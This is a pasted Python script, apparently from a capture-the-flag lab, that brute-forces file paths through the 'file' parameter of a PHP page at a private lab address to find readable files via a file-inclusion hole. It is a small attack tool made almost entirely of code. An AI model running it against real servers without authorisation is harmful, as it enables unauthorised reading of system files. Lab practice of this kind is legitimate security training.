Advertisement
Guest User

web_fuzzer.py

a guest
Nov 14th, 2021
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.98 KB | None | 0 0
  1. #!/usr/bin/python3
  2.  
  3. from pwn import *
  4. import pdb
  5.  
  6. #Variables
  7.  
  8. URL = "http://10.10.10.84/browse.php?file="
  9.  
  10.  
  11.  
  12. def def_hundler(sig, frame):
  13.     print("[!]Saliendo...")
  14.     sys.exit(1)
  15.  
  16. signal.signal(signal.SIGINT, def_hundler)
  17.  
  18.  
  19. #Funciones
  20. def makeRequest():
  21.     try:
  22.         p1 = log.progress("Iniciando Fuerza Bruta de directorios")
  23.         with open('diccionario.txt', encoding='utf8') as f:
  24.             for line in f:
  25.                 p1.status("Probando con la ruta %s" % line.strip())
  26.                 r = requests.get(URL+line.strip())
  27. #               pdb.set_trace()
  28.                 if "Failed opening" in r.text:
  29.                     pass
  30.                 else:
  31.                     print("Se ha encontrado una ruta: %s" % line.strip())
  32.                    
  33.  
  34.     except Exception as e:
  35.         print(e)
  36.  
  37.  
  38.  
  39.  
  40. if __name__ == '__main__':
  41.     print("""
  42. ██╗    ██╗███████╗██████╗     ███████╗██╗   ██╗███████╗███████╗███████╗██████╗
  43. ██║    ██║██╔════╝██╔══██╗    ██╔════╝██║   ██║╚══███╔╝╚══███╔╝██╔════╝██╔══██╗
  44. ██║ █╗ ██║█████╗  ██████╔╝    █████╗  ██║   ██║  ███╔╝   ███╔╝ █████╗  ██████╔╝
  45. ██║███╗██║██╔══╝  ██╔══██╗    ██╔══╝  ██║   ██║ ███╔╝   ███╔╝  ██╔══╝  ██╔══██╗
  46. ╚███╔███╔╝███████╗██████╔╝    ██║     ╚██████╔╝███████╗███████╗███████╗██║  ██║
  47. ╚══╝╚══╝ ╚══════╝╚═════╝     ╚═╝      ╚═════╝ ╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝ by Tukutu""")
  48.     makeRequest()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement